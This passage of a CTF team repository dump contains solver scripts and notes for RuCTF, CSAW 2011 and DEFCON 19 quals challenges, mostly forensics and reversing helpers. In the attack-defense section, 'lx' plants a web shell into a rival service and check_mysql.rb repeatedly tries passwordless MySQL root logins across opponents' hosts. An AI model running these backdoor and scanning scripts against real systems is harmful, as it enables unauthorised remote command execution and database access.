(23..300).each do |y| 28 | s = pixel(x,y) 29 | break if s == 33 30 | n += 1 31 | end 32 | r << n 33 | end 34 | r.map{ |x| sprintf("%02x",x) }.join 35 | end 36 | 37 | if ARGV.size > 0 38 | fname = ARGV.first 39 | digest = file2digest(fname) 40 | puts digest 41 | else 42 | Dir['../data/*'].each do |fname| 43 | STDERR.puts(fname) 44 | begin 45 | digest = file2digest(fname) 46 | puts "#{File.basename(fname).ljust(15)} #{digest}" 47 | rescue 48 | STDERR.puts($!.message) 49 | end 50 | end 51 | end 52 | -------------------------------------------------------------------------------- /2010.ructf/reversing/hint.arg: -------------------------------------------------------------------------------- 1 | 3255 2 | -------------------------------------------------------------------------------- /2010.ructf/reversing/hint.txt: -------------------------------------------------------------------------------- 1 | struct registers{unsigned short ip;unsigned short sp;unsigned short bp;} reg;

2 | enum opcodes{SET=0x0,MOV=0x1,ADD=0x2,SUB=0x3,MUL=0x4,
3 | JMP=0x5,JE=0x6,JA=0x7,JB=0x8,CALL=0x9,RET=0xa,DIV=0xb,READ=0x10,WRITE=0x11,
4 | PRINT=0x12,EXEC=0x13,PUSH=0x20,POP=0x21,ENTER=0x22,LEAVE=0x23,GETBP=0x24,PTR=0x25,MOVPTR=0x26,
5 | END=0x30,DUMP=0x40,CONTTYPE=0x41,SHOWSHORT=0x42,GETSHORT=0x43};
6 | -------------------------------------------------------------------------------- /2010.ructf/reversing/launch: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2010.ructf/reversing/launch -------------------------------------------------------------------------------- /2010.ructf/reversing/work 100%/99: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2010.ructf/reversing/work 100%/99 -------------------------------------------------------------------------------- /2010.ructf/reversing/work 100%/echo: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2010.ructf/reversing/work 100%/echo -------------------------------------------------------------------------------- /2010.ructf/reversing/work 100%/fact: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2010.ructf/reversing/work 100%/fact -------------------------------------------------------------------------------- /2010.ructf/reversing/work 100%/hello: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2010.ructf/reversing/work 100%/hello -------------------------------------------------------------------------------- /2010.ructf/reversing/work 100%/hint: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2010.ructf/reversing/work 100%/hint -------------------------------------------------------------------------------- /2010.ructf/reversing/work 100%/set: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2010.ructf/reversing/work 100%/set -------------------------------------------------------------------------------- /2010.ructf/reversing/work 90%/get: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2010.ructf/reversing/work 90%/get -------------------------------------------------------------------------------- /2010.ructfe/nibbles.tar.gz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2010.ructfe/nibbles.tar.gz -------------------------------------------------------------------------------- /2010.ructfe/photos.hack/check_mysql.rb: -------------------------------------------------------------------------------- 1 | #!/usr/bin/ruby 2 | require 'open-uri' 3 | require 'mechanize' 4 | require 'socket' 5 | 6 | 7 | INFECTED = %w'24 26 12 1 5 32 19 43' 8 | 9 | PATCHED = %w'' 10 | 11 | DOWN = %w'33 32 40 46 22 17 54 8 25 42 50 15 20 41 53 56 28' 12 | 13 | ips = open('http://status.ructf.org/').read. 14 | scan(/\d+\.\d+\.\d+\.\d+/). 15 | uniq. 16 | map{ |x| x.sub(/\.4$/,'.3') } - (PATCHED+DOWN).map{|x| "10.#{x}.0.3"} 17 | 18 | def process ip 19 | system "mysql -h #{ip} -u root -e 'show databases' --connect_timeout=5" 20 | system "mysql -h #{ip} -u xxx -e 'show databases' --connect_timeout=5" 21 | sleep 0.5 22 | end 23 | 24 | if ARGV.any? 25 | ARGV.each{ |ip| process ip } 26 | end 27 | 28 | while true do 29 | ips.each{ |ip| process ip } 30 | end 31 | -------------------------------------------------------------------------------- /2010.ructfe/photos.hack/lx: -------------------------------------------------------------------------------- 1 | cd /home/photos 2 | echo ' ;post("/photos"){`#{request.body.read}`}' >> main.rb 3 | killall -9 ruby19 4 | sleep 5 5 | /usr/local/bin/ruby19 main.rb > /dev/null 2> /dev/null & 6 | cd /tmp 7 | rm $0 8 | -------------------------------------------------------------------------------- /2010.ructfe/photos.task/avatar.pl: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl 2 | 3 | @name = map ord, split //, $ARGV[0]; 4 | @title = (map ord, split //, $ARGV[1])x128; 5 | 6 | ($\, $,) = ($/, ' '); 7 | for $i (0..127) 8 | { 9 | print map {$name[($i + $_) % @name] ^ $title[$i] ^ $title[$_]} 0..127; 10 | } -------------------------------------------------------------------------------- /2010.ructfe/photos.task/avatar1.pl: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl 2 | 3 | print %ENV; 4 | 5 | @name = map ord, split //, $ARGV[0]; 6 | @title = (map ord, split //, $ARGV[1])x128; 7 | 8 | ($\, $,) = ($/, ' '); 9 | for $i (0..127) 10 | { 11 | print map {$name[($i + $_) % @name] ^ $title[$i] ^ $title[$_]} 0..127; 12 | } 13 | -------------------------------------------------------------------------------- /2010.ructfe/photos.task/create_avatar.pl: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl 2 | 3 | use GD; 4 | 5 | $filename = shift @ARGV || die "USAGE: $0 "; 6 | $SIZE = 128; 7 | 8 | # Create new image with TrueColor 9 | $im = new GD::Image($SIZE, $SIZE, 1); 10 | $im->interlaced('true'); 11 | 12 | $n = 0; 13 | while (<>) 14 | { 15 | @str = split /\s+/; 16 | for (0..$SIZE - 1) 17 | { 18 | $r = int(7 * rand) % 7 + 1; 19 | $color = $im->colorAllocate($r & 1 ? $str[$_] : 0, $r & 2 ? $str[$_] : 0, $r & 4 ? $str[$_] : 0); 20 | $im->setPixel($n, $_, $color); 21 | } 22 | ++$n; 23 | } 24 | 25 | # Open file to write 26 | open(PICTURE, '>'.$filename) or die("Cannot open file for writing"); 27 | binmode PICTURE; 28 | print PICTURE $im->png; 29 | close PICTURE; -------------------------------------------------------------------------------- /2010.ructfe/photos.task/database.db: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2010.ructfe/photos.task/database.db -------------------------------------------------------------------------------- /2010.ructfe/photos.task/files/image/back.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2010.ructfe/photos.task/files/image/back.jpg -------------------------------------------------------------------------------- /2010.ructfe/photos.task/files/image/button.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2010.ructfe/photos.task/files/image/button.png -------------------------------------------------------------------------------- /2010.ructfe/photos.task/files/image/knight.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2010.ructfe/photos.task/files/image/knight.png -------------------------------------------------------------------------------- /2010.ructfe/photos.task/files/image/logo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2010.ructfe/photos.task/files/image/logo.png -------------------------------------------------------------------------------- /2010.ructfe/photos.task/files/image/plus.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2010.ructfe/photos.task/files/image/plus.png -------------------------------------------------------------------------------- /2010.ructfe/photos.task/files/image/void.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2010.ructfe/photos.task/files/image/void.gif -------------------------------------------------------------------------------- /2010.ructfe/photos.task/views/ads.haml: -------------------------------------------------------------------------------- 1 | %div{'id' => 'ads'} -------------------------------------------------------------------------------- /2010.ructfe/photos.task/views/albums.haml: -------------------------------------------------------------------------------- 1 | %div{'id' => 'albums', 'class' => 'page'} -------------------------------------------------------------------------------- /2010.ructfe/photos.task/views/header.haml: -------------------------------------------------------------------------------- 1 | %tr 2 | %td{'align' => 'left', 'id' => 'logo', 'width' => '200'} 3 | %img{'src' => 'files/image/logo.png'} 4 | %td{'align' => 'right', 'valign' => 'top', 'id' => 'welcome'} 5 | %table 6 | %tr 7 | %td{'id' => 'nickname'} 8 | - if (@auth) 9 | = @login 10 | - if (! @auth) 11 | %td{'class' => 'button','id' => 'nav_login'} 12 | %a 13 | Login 14 | - else 15 | %td{'class' => 'button','id' => 'nav_logout'} 16 | %a 17 | Logout 18 | -------------------------------------------------------------------------------- /2010.ructfe/photos.task/views/login_form.haml: -------------------------------------------------------------------------------- 1 | %div{'id' => 'login_form', 'class' => 'page'} 2 | %form{'action' => 'login', 'method' => 'post', 'id' => 'auth_form'} 3 | %div{'class' => 'minititle'} 4 | Login 5 | %div 6 | Login: 7 | %input{'type' => 'text', 'id' => 'login', 'name' =>'login', 'class' => 'text'} 8 | %div 9 | Password: 10 | %input{'type' => 'password', 'id' => 'password', 'name' =>'password', 'class' => 'text'} 11 | %div{'id' => 'check_login_form', 'class' => 'error'} 12 | %div{'style' => 'text-align : center;'} 13 | %input{'class' => 'abutton','type' => 'submit','value' => 'Login'} 14 | -------------------------------------------------------------------------------- /2010.ructfe/photos.task/views/navigation.haml: -------------------------------------------------------------------------------- 1 | #navigation 2 | %table{'width' => '165px'} 3 | %tr 4 | %td{'id' => 'nav_albums'} 5 | %a{'class' => 'unselected'} 6 | Albums 7 | %tr 8 | %td 9 | - if (@auth) 10 | #albums_panel 11 | %a{'id' => 'create_album_button', 'class' => 'unselected'} 12 | Create Album 13 | 14 | 15 | -------------------------------------------------------------------------------- /2010.ructfe/photos.task/views/show_pictures.haml: -------------------------------------------------------------------------------- 1 | %div{'id' => 'show', 'class' => 'page'} 2 | -------------------------------------------------------------------------------- /2010.ructfe/photos.task/views/upload_pictures.haml: -------------------------------------------------------------------------------- 1 | %div{'id' => 'upload', 'class' => 'page'} 2 | %form{'action' => 'ajax/upload', 'method' => 'post', 'enctype' => 'multipart/form-data', 'target' => 'upload_response', 'id' => 'upload_form'} 3 | %div{'class' => 'minititle'} 4 | Upload your photos in album 5 | %div 6 | Title: 7 | %input{'type' => 'text','maxlength' => '15', 'id' => 'title_input', 'name' =>'title_input'} 8 | %div 9 | %input{'type' => 'file', 'id' => 'file_input', 'name' => 'file_input'} 10 | %input{'type' => 'hidden', 'id' => 'aid', 'name' => 'aid', 'value' => '1'} 11 | %div{'class' => 'error'} 12 | #check_upload_form 13 | #upload_form_button 14 | %a{'class' => 'abutton'} 15 | Upload 16 | %iframe{'style' => 'display: none;', 'id' => 'upload_response'} 17 | -------------------------------------------------------------------------------- /2010.ructfe/trojanXXX.gz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2010.ructfe/trojanXXX.gz -------------------------------------------------------------------------------- /2011.csaw/100.forensics101/README: -------------------------------------------------------------------------------- 1 | внутри JPEG, порезанный на 24 куска по 1500 байт 2 | 3 | NOT SOLVED 4 | -------------------------------------------------------------------------------- /2011.csaw/100.forensics101/cutyoface.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.csaw/100.forensics101/cutyoface.zip -------------------------------------------------------------------------------- /2011.csaw/100.reversing101+/0_fixie.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.csaw/100.reversing101+/0_fixie.jar -------------------------------------------------------------------------------- /2011.csaw/100.reversing101+/1_binary_string: -------------------------------------------------------------------------------- 1 | E6 U/V/  1 : 0 2 | -------------------------------------------------------------------------------- /2011.csaw/100.reversing101+/2_xorer.rb: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env ruby 2 | require 'open-uri' 3 | 4 | URL = 'http://insecure.org/stf/smashstack.html' 5 | 6 | class String 7 | def xor x 8 | if x.is_a?(String) 9 | r = '' 10 | j = 0 11 | 0.upto(self.size-1) do |i| 12 | r << (self[i].ord^x[j].ord).chr 13 | j+=1 14 | j=0 if j>= x.size 15 | end 16 | r 17 | else 18 | r = '' 19 | 0.upto(self.size-1) do |i| 20 | r << (self[i].ord^x).chr 21 | end 22 | r 23 | end 24 | end 25 | end 26 | 27 | data = File.read('1_binary_string') 28 | p data.xor('tigerappleipodiphoneapplemacbook'); 29 | -------------------------------------------------------------------------------- /2011.csaw/100.reversing101+/README.md: -------------------------------------------------------------------------------- 1 | 1. декомпилим яву с помощью jad 2 | 2. заменяем `if(showKey != 1)` на безусловное выполнение 3 | 3. компилим обратно 4 | 4. запускаем, получаем бинарную строку 5 | 5. ксорим полученную строку c `tigerappleipodiphoneapplemacbook` 6 | 6. ответ `1_l0ve_th3m_fishes_cause_they_so` 7 | -------------------------------------------------------------------------------- /2011.csaw/200.net.hardware+/1.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.csaw/200.net.hardware+/1.jpg -------------------------------------------------------------------------------- /2011.csaw/200.net.hardware+/1.rb: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env ruby 2 | Dir['data?'].sort.each do |fname| 3 | r = '' 4 | data = File.read(fname) 5 | 0.upto(data.size/2) do |i| 6 | r << data[i*2,2].to_i(16).chr 7 | end 8 | r = r[0x40..-2] 9 | if r.size < 1000 10 | r = r[0..-2] while r[-1..-1].ord == 00 11 | end 12 | puts "[.] #{r.size} bytes" 13 | File.open("#{fname}.bin",'w') do |f| 14 | f << r 15 | end 16 | end 17 | 18 | `cat data*bin > 1.jpg` 19 | -------------------------------------------------------------------------------- /2011.csaw/200.net.hardware+/2.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.csaw/200.net.hardware+/2.jpg -------------------------------------------------------------------------------- /2011.csaw/200.net.hardware+/capture.pcap: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.csaw/200.net.hardware+/capture.pcap -------------------------------------------------------------------------------- /2011.csaw/200.net.hardware+/data0.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.csaw/200.net.hardware+/data0.bin -------------------------------------------------------------------------------- /2011.csaw/200.net.hardware+/data0.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.csaw/200.net.hardware+/data0.jpg -------------------------------------------------------------------------------- /2011.csaw/200.net.hardware+/data1.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.csaw/200.net.hardware+/data1.bin -------------------------------------------------------------------------------- /2011.csaw/200.net.hardware+/data2.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.csaw/200.net.hardware+/data2.bin -------------------------------------------------------------------------------- /2011.csaw/200.net.hardware+/data3.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.csaw/200.net.hardware+/data3.bin -------------------------------------------------------------------------------- /2011.csaw/200.net.hardware+/data4.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.csaw/200.net.hardware+/data4.bin -------------------------------------------------------------------------------- /2011.csaw/200.net.hardware+/data5.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.csaw/200.net.hardware+/data5.bin -------------------------------------------------------------------------------- /2011.csaw/200.net.hardware+/data6.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.csaw/200.net.hardware+/data6.bin -------------------------------------------------------------------------------- /2011.csaw/200.net.hardware+/data7.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.csaw/200.net.hardware+/data7.bin -------------------------------------------------------------------------------- /2011.csaw/200.net.hardware+/data8.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.csaw/200.net.hardware+/data8.bin -------------------------------------------------------------------------------- /2011.csaw/400.net.patch.mgmt+/README: -------------------------------------------------------------------------------- 1 | Debian OpenSSL vulnerability 2 | 3 | http://www.willhackforsushi.com/Home/Entries/2009/2/3_Decrypting_DebIan-Vulnerable_SSH_Traffic.html 4 | http://digitaloffense.net/tools/debian-openssl/ 5 | http://seclists.org/pen-test/2008/Jul/50 6 | http://syscall.eu/ 7 | http://www.ethicalhacker.net/content/view/265/1/ 8 | 9 | required files: 10 | debian_ssh_dsa_1024_x86.tar.bz2 (30M) 11 | ssh_kex_keygen-1.1.tar.bz2 (2.5M) 12 | -------------------------------------------------------------------------------- /2011.csaw/400.net.patch.mgmt+/capture.pcap: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.csaw/400.net.patch.mgmt+/capture.pcap -------------------------------------------------------------------------------- /2011.csaw/400.net.patch.mgmt+/keygen: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.csaw/400.net.patch.mgmt+/keygen -------------------------------------------------------------------------------- /2011.csaw/400.net.patch.mgmt+/ssh_decoder.rb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.csaw/400.net.patch.mgmt+/ssh_decoder.rb -------------------------------------------------------------------------------- /2011.csaw/400.net.patch.mgmt+/ssh_decoder2.rb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.csaw/400.net.patch.mgmt+/ssh_decoder2.rb -------------------------------------------------------------------------------- /2011.csaw/400.net.patch.mgmt+/z1.sh: -------------------------------------------------------------------------------- 1 | LD_PRELOAD=./fakepid.so ./keygen -G 02 -K 0ac0c15cf46ebb785c4605eb96135d4c986b36ae4ecd693aa171be39d6cdcc6d5855037000a89cc88ea67f92a798db70e20dd490caaaf3fd0b99c7a7b91863c4c3c280fa05a991ad38300c4de231c6222f161ea7a977f957ec702f726d28d39dee4b9a819e7c2777a360977c38366b8138b1408af416dd2f481f39546fbb79f7 -P 00de49fc9069994c379d2b6563efd37efae6785eeb1dd0a12b090aac272b22df8c64a4a2ab7b99ce0b77a9a52e0833d52d53b258cedffd175dc8a3766a9b9807362646dc9215628c3f4af0e08d00ab60a3b9e55bae47e82651da0c15a27355ddb06365cae1ddde4c0c97dc9942fd65e9867fa50e72e1c785411edd28de26551b8b -b 256 -k 3b24cb533f4a0d313c762a1a59e72aa8b5d14502f5fabb2821b149c2b26c686eeff02420679ef1b8ebcd2537f4bdd5421b51b3a85a6decb3c000cfafad9f0b2f8ec0569caca0abced03f0552a0b19fa022d0a2054a82ea35c35b88c57c33a53e1d2fbe9b34b91a1208e37ec2618d390584970a218f26cb3875cbe289b851e914 -n 2 -p 0-0x7fff -s 2 | -------------------------------------------------------------------------------- /2011.csaw/400.net.patch.mgmt+/z2.sh: -------------------------------------------------------------------------------- 1 | ./keygen -G 02 -K 3b24cb533f4a0d313c762a1a59e72aa8b5d14502f5fabb2821b149c2b26c686eeff02420679ef1b8ebcd2537f4bdd5421b51b3a85a6decb3c000cfafad9f0b2f8ec0569caca0abced03f0552a0b19fa022d0a2054a82ea35c35b88c57c33a53e1d2fbe9b34b91a1208e37ec2618d390584970a218f26cb3875cbe289b851e914 -P 00de49fc9069994c379d2b6563efd37efae6785eeb1dd0a12b090aac272b22df8c64a4a2ab7b99ce0b77a9a52e0833d52d53b258cedffd175dc8a3766a9b9807362646dc9215628c3f4af0e08d00ab60a3b9e55bae47e82651da0c15a27355ddb06365cae1ddde4c0c97dc9942fd65e9867fa50e72e1c785411edd28de26551b8b -b 256 -c -k 0ac0c15cf46ebb785c4605eb96135d4c986b36ae4ecd693aa171be39d6cdcc6d5855037000a89cc88ea67f92a798db70e20dd490caaaf3fd0b99c7a7b91863c4c3c280fa05a991ad38300c4de231c6222f161ea7a977f957ec702f726d28d39dee4b9a819e7c2777a360977c38366b8138b1408af416dd2f481f39546fbb79f7 -n 1 -p 0-0x7fff 2 | -------------------------------------------------------------------------------- /2011.csaw/README.md: -------------------------------------------------------------------------------- 1 | CSAW CTF 2011 2 | ============= 3 | 4 | * [challenges repository](http://repo.shell-storm.org/CTF/CSAW-2011/) 5 | -------------------------------------------------------------------------------- /2011.csaw/exploit.200/1.rb: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env ruby 2 | 3 | 0.upto(2000).each do |x| 4 | puts "./1 540 #{x}" 5 | end 6 | -------------------------------------------------------------------------------- /2011.csaw/exploit.200/bin1: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.csaw/exploit.200/bin1 -------------------------------------------------------------------------------- /2011.csaw/exploit.200/gdbscript: -------------------------------------------------------------------------------- 1 | break *0x08048629 2 | run MOTR 3 | x/50x $sp 4 | -------------------------------------------------------------------------------- /2011.csaw/exploit.200/key: -------------------------------------------------------------------------------- 1 | FUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU 2 | -------------------------------------------------------------------------------- /2011.csaw/exploit.200/motr: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.csaw/exploit.200/motr -------------------------------------------------------------------------------- /2011.defcon19-quals/f100/450x42.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.defcon19-quals/f100/450x42.png -------------------------------------------------------------------------------- /2011.defcon19-quals/f100/761x25.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.defcon19-quals/f100/761x25.png -------------------------------------------------------------------------------- /2011.defcon19-quals/f100/README: -------------------------------------------------------------------------------- 1 | оригинал - картинка высотой в 1 пиксель 2 | сворачиваем ее и получаем 2 надписи 3 | одна из них и есть ответ 4 | -------------------------------------------------------------------------------- /2011.defcon19-quals/f100/enum_sizes.rb: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env ruby 2 | require 'zlib' 3 | 4 | data = File.read(ARGV[0]) 5 | 6 | data.force_encoding('ascii-8bit') 7 | 8 | def put data, start, value 9 | data[start+0] = (value>>24).chr 10 | data[start+1] = ((value>>16)&0xff).chr 11 | data[start+2] = ((value>>8)&0xff).chr 12 | data[start+3] = (value&0xff).chr 13 | end 14 | 15 | fnames = [] 16 | 17 | 2.upto(19024) do |width| 18 | #width = ARGV[1].to_i 19 | height = 19025 / width 20 | 21 | 22 | put data, 0x10, width 23 | put data, 0x14, height 24 | 25 | crc = Zlib::crc32(data[0x0c,0x0d+4]) 26 | 27 | p data[0x1d,4] 28 | 29 | put data, 0x1d, crc 30 | 31 | p data[0x1d,4] 32 | 33 | fname = "#{width}x#{height}.png" 34 | fnames << fname 35 | File.open("f100/#{fname}",'w') do |f| 36 | f << data 37 | end 38 | 39 | end 40 | 41 | File.open("f100/index.html","w") do |f| 42 | f << fnames.map{ |f| "
" }.join 43 | end 44 | -------------------------------------------------------------------------------- /2011.defcon19-quals/f100/f100_fb8149b6f6eaef95d38.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.defcon19-quals/f100/f100_fb8149b6f6eaef95d38.png -------------------------------------------------------------------------------- /2011.defcon19-quals/f100/fix_crc.rb: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env ruby 2 | require 'zlib' 3 | 4 | data = File.read(ARGV[0]) 5 | 6 | data.force_encoding('ascii-8bit') 7 | 8 | crc = Zlib::crc32(data[0x0c,0x0d+4]) 9 | 10 | p data[0x1d,4] 11 | 12 | data[0x1d] = (crc>>24).chr 13 | data[0x1e] = ((crc>>16)&0xff).chr 14 | data[0x1f] = ((crc>>8)&0xff).chr 15 | data[0x20] = (crc&0xff).chr 16 | 17 | p data[0x1d,4] 18 | 19 | File.open(ARGV[0],'w') do |f| 20 | f << data 21 | end 22 | -------------------------------------------------------------------------------- /2011.defcon19-quals/f100/fix_size.rb: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env ruby 2 | require 'zlib' 3 | 4 | data = File.read(ARGV[0]) 5 | 6 | data.force_encoding('ascii-8bit') 7 | 8 | width = ARGV[1].to_i 9 | height = 19025 / width 10 | 11 | def put data, start, value 12 | data[start+0] = (value>>24).chr 13 | data[start+1] = ((value>>16)&0xff).chr 14 | data[start+2] = ((value>>8)&0xff).chr 15 | data[start+3] = (value&0xff).chr 16 | end 17 | 18 | put data, 0x10, width 19 | put data, 0x14, height 20 | 21 | crc = Zlib::crc32(data[0x0c,0x0d+4]) 22 | 23 | p data[0x1d,4] 24 | 25 | put data, 0x1d, crc 26 | 27 | p data[0x1d,4] 28 | 29 | File.open(ARGV[0],'w') do |f| 30 | f << data 31 | end 32 | -------------------------------------------------------------------------------- /2011.defcon19-quals/f400/README: -------------------------------------------------------------------------------- 1 | образ PDF эксплоита для jailbreak-а айфона 2 | 3 | 1. находим оригинальный PDF jailbreak (JailBreakMe) 4 | 2. распаковываем оба образа ФС 5 | 3. удаляем одинаковые файлы из ddtek-овского 6 | 4. получаем файл /usr/bin/dd 7 | 5. strings -> кучка больших чисел вида 109868682..........8322997248.000000 8 | 6. конвертим во float и каким-то образом смотрим их binary representation 9 | 7. "DDTEKJailbreaksarethemostbestest" 10 | -------------------------------------------------------------------------------- /2011.defcon19-quals/f400/bin/dd: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.defcon19-quals/f400/bin/dd -------------------------------------------------------------------------------- /2011.defcon19-quals/f400/bin/decode.rb: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env ruby 2 | data = File.read('strings').strip.gsub(/\.0+$/,'').split("\n") 3 | sum = 0 4 | data.map! do |row| 5 | # puts row 6 | sum += row.to_i 7 | # puts row.to_i.to_s(2).sub(/0+$/,'') 8 | x = row.to_i.to_s(16)[0..13] 9 | # puts x 10 | x 11 | end 12 | 13 | #exit 14 | 15 | #puts 16 | #puts "[.] sum = #{sum}" 17 | #puts 18 | 19 | #data << sum.to_s 20 | 21 | data[0] = (data[0].to_i(16) << 1).to_s(16) 22 | data[2] = (data[2].to_i(16) << 1).to_s(16) 23 | 24 | r = '' 25 | data.each do |row| 26 | s = '' 27 | # puts row 28 | 0.step(row.size,2) do |i| 29 | char = row[i,2] 30 | # p char 31 | next if char == "" || char == "0" 32 | s = char.to_i(16).chr + s 33 | end 34 | p s 35 | r << s 36 | end 37 | p r 38 | -------------------------------------------------------------------------------- /2011.defcon19-quals/f400/bin/strings: -------------------------------------------------------------------------------- 1 | 41358753080588780315500696417148503196370008505043360338644939021284539327654424368206170740213813076058322365516034006270625614745638277215965686397551374257625369654940618745555501980517665488240640.000000 2 | 273020167277193934342483321951392739131140631949880731514555218503200924051802886516416983650292597201352459748672990971210795734498587443982103979231419127824384.000000 3 | 109868682199889090983893607446542759799370795099978204527886814871815275332732684149782782932243583477726231807149879389352427825978796531514954916754473975757796372140255258111985922092457311221042226817127194804092923531694479704498641458322997248.000000 4 | 8887824086628450300085222950423508459269193936749714415660759918033307608850811297588582757614917095982291010098451602122996273175590810261747631678220597664532468741350897995232883808808537964727011624779797357169712195651789942060581116921485444775936.000000 5 | -------------------------------------------------------------------------------- /2011.defcon19-quals/f400/rm_md5.rb: -------------------------------------------------------------------------------- 1 | #!/usr/bin/ruby 2 | require 'digest/md5' 3 | 4 | sums = {} 5 | 6 | `find wad_jailbreakme -type f`.split("\n").each do |fname| 7 | sum = Digest::MD5.hexdigest(File.read(fname)) 8 | sums[sum] = 1 9 | end 10 | 11 | `find wad_ddtek -type f`.split("\n").each do |fname| 12 | sum = 